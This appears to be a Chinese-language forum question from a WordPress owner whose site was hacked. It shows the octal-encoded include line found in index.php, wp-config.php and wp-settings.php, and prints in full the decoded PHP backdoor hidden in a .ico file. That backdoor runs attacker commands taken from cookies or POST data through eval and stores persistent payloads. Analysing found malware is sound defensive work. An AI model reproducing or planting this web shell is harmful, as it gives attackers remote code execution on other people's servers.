我的wordpress网站最近遭到黑客攻击。经过研究,我发现有3个文件被感染:
索引。php wp配置。php wp设置。php包括以下代码:
@include "\\057h\\157m\\145/mywebsite/\\160u\\142l\\151c\\137h\\164m\\154/\\167p\\055c\\157n\\164e\\156t\\057c\\141c\\150e\\057a\\154l\\057.\\062d\\061c\\061b\\144d\\056i\\143o";
解码八进制字符表明它试图包含一个名为
.2d1c1bdd.ico. 该文件基本上包含使用简单php库(如urlencode)加密的恶意软件的主代码。对其进行解码会显示以下内容:
<?php
if (!defined(\'stream_context_create \')) {
define(\'stream_context_create \', 1);
@ini_set(\'error_log\', null);
@ini_set(\'log_errors\', 0);
@ini_set(\'max_execution_time\', 0);
@error_reporting(0);
@set_time_limit(0);
if (!defined("PHP_EOL")) {
define("PHP_EOL", "\\n");
}
if (!defined(\'file_put_contents \')) {
define(\'file_put_contents \', 1);
$lzkplbb = \'aebcf4be-c99f-482f-99ba-2502f326ba8b\';
global $lzkplbb;
function jwryleag($reidlomlbkbcttm) {
if (strlen($reidlomlbkbcttm) < 4) {
return "";
}
$vfdlzsgb = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$rnbfucpt = str_split($vfdlzsgb);
$rnbfucpt = array_flip($rnbfucpt);
$reidloml = 0;
$pghzvmajmpz = "";
$reidlomlbkbcttm = preg_replace("~[^A-Za-z0-9\\+\\/\\=]~", "", $reidlomlbkbcttm);
do {
$emntfw = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$uafvfcjv = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$axokje = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$reidlomlwepon = $rnbfucpt[$reidlomlbkbcttm[$reidloml++]];
$mgrdvzbs = ($emntfw << 2) | ($uafvfcjv >> 4);
$pwkimdf = (($uafvfcjv & 15) << 4) | ($axokje >> 2);
$xbtgle = (($axokje & 3) << 6) | $reidlomlwepon;
$pghzvmajmpz = $pghzvmajmpz . chr($mgrdvzbs);
if ($axokje != 64) {
$pghzvmajmpz = $pghzvmajmpz . chr($pwkimdf);
}
if ($reidlomlwepon != 64) {
$pghzvmajmpz = $pghzvmajmpz . chr($xbtgle);
}
} while ($reidloml < strlen($reidlomlbkbcttm));
return $pghzvmajmpz;
}
if (!function_exists(\'file_put_contents\')) {
function file_put_contents($yselkrw, $pghzvmilkupu, $ggsmcp = false)
{
$ctbgwps = $ggsmcp == 8 ? \'a\' : \'w\';
$pghzvm = @fopen($yselkrw, $ctbgwps);
if ($pghzvm === false) {
return 0;
} else {
if (is_array($pghzvmilkupu)) {
$pghzvmilkupu = implode($pghzvmilkupu);
}
$lziccbi = fwrite($pghzvm, $pghzvmilkupu);
fclose($pghzvm);
return $lziccbi;
}
}
}
if (!function_exists(\'file_get_contents\')) {
function file_get_contents($aqcfyovb)
{
$tzhboa = fopen($aqcfyovb, "r");
$knhvhvg = fread($tzhboa, filesize($aqcfyovb));
fclose($tzhboa);
return $knhvhvg;
}
}
function syywzq() {
return trim(preg_replace("/\\(.*\\$/", \'\', __FILE__));
}
function pobfnz($pghzvmilkupuwtjllzq, $mocxvow) {
$reidlomldpgbujw = "";
for ($reidloml = 0; $reidloml < strlen($pghzvmilkupuwtjllzq);) {
for ($reidlomlsjdziqx = 0; $reidlomlsjdziqx < strlen($mocxvow) && $reidloml < strlen($pghzvmilkupuwtjllzq); $reidlomlsjdziqx++, $reidloml++) {
$reidlomldpgbujw .= chr(ord($pghzvmilkupuwtjllzq[$reidloml]) ^ ord($mocxvow[$reidlomlsjdziqx]));
}
}
return $reidlomldpgbujw;
}
function epyogfrf($pghzvmilkupuwtjllzq, $mocxvow) {
global $lzkplbb;
return pobfnz(pobfnz($pghzvmilkupuwtjllzq, $mocxvow), $lzkplbb);
}
function faysby($pghzvmilkupuwtjllzq, $mocxvow) {
global $lzkplbb;
return pobfnz(pobfnz($pghzvmilkupuwtjllzq, $lzkplbb), $mocxvow);
}
function xlkrcv() {
$reidlomlsjdziqxsgzoe = @file_get_contents(syywzq());
$xzusfija = strpos($reidlomlsjdziqxsgzoe, md5(syywzq()));
if ($xzusfija !== false) {
$ytlxxkwa = substr($reidlomlsjdziqxsgzoe, $xzusfija + 32);
$yselkrwuvoqce = @unserialize(epyogfrf(rawurldecode($ytlxxkwa), md5(syywzq())));
} else {
$yselkrwuvoqce = array();
}
return $yselkrwuvoqce;
}
function jtjisw($yselkrwuvoqce) {
$ubfwum = rawurlencode(faysby(@serialize($yselkrwuvoqce), md5(syywzq())));
$reidlomlsjdziqxsgzoe = @file_get_contents(syywzq());
$xzusfija = strpos($reidlomlsjdziqxsgzoe, md5(syywzq()));
if ($xzusfija !== false) {
$reidlomlsjdziqxzvmfh = substr($reidlomlsjdziqxsgzoe, $xzusfija + 32);
$reidlomlsjdziqxsgzoe = str_replace($reidlomlsjdziqxzvmfh, $ubfwum, $reidlomlsjdziqxsgzoe);
} else {
$reidlomlsjdziqxsgzoe = $reidlomlsjdziqxsgzoe . "\\n\\n//" . md5(syywzq()) . $ubfwum;
}
@file_put_contents(syywzq(), $reidlomlsjdziqxsgzoe);
}
function wdvuby($yselkrwjhujdy, $micvdqw) {
$yselkrwuvoqce = xlkrcv();
$yselkrwuvoqce[$yselkrwjhujdy] = jwryleag($micvdqw);
jtjisw($yselkrwuvoqce);
}
function spgrudzn($yselkrwjhujdy) {
$yselkrwuvoqce = xlkrcv();
unset($yselkrwuvoqce[$yselkrwjhujdy]);
jtjisw($yselkrwuvoqce);
}
function krtogen($yselkrwjhujdy = null) {
foreach (xlkrcv() as $vjoavt => $mgfnpuj) {
if ($yselkrwjhujdy) {
if (strcmp($yselkrwjhujdy, $vjoavt) == 0) {
eval($mgfnpuj);
break;
}
} else {
eval($mgfnpuj);
}
}
}
foreach (array_merge($_COOKIE, $_POST) as $rtxoabsk => $pghzvmilkupuwtjllzq) {
$pghzvmilkupuwtjllzq = @unserialize(epyogfrf(jwryleag($pghzvmilkupuwtjllzq), $rtxoabsk));
if (isset($pghzvmilkupuwtjllzq[\'ak\']) && $lzkplbb == $pghzvmilkupuwtjllzq[\'ak\']) {
if ($pghzvmilkupuwtjllzq[\'a\'] == \'i\') {
$reidloml = array(
\'pv\' => @phpversion(),
\'sv\' => \'2.0-1\',
\'ak\' => $pghzvmilkupuwtjllzq[\'ak\']
);
echo @serialize($reidloml);
exit;
} elseif ($pghzvmilkupuwtjllzq[\'a\'] == \'e\') {
eval($pghzvmilkupuwtjllzq[\'d\']);
} elseif ($pghzvmilkupuwtjllzq[\'a\'] == \'plugin\') {
if ($pghzvmilkupuwtjllzq[\'sa\'] == \'add\') {
wdvuby($pghzvmilkupuwtjllzq[\'p\'], $pghzvmilkupuwtjllzq[\'d\']);
} elseif ($pghzvmilkupuwtjllzq[\'sa\'] == \'rem\') {
spgrudzn($pghzvmilkupuwtjllzq[\'p\']);
}
}
echo $pghzvmilkupuwtjllzq[\'ak\'];
exit();
}
}
krtogen();
}
}
我还在努力理解代码。任何帮助都将不胜感激。
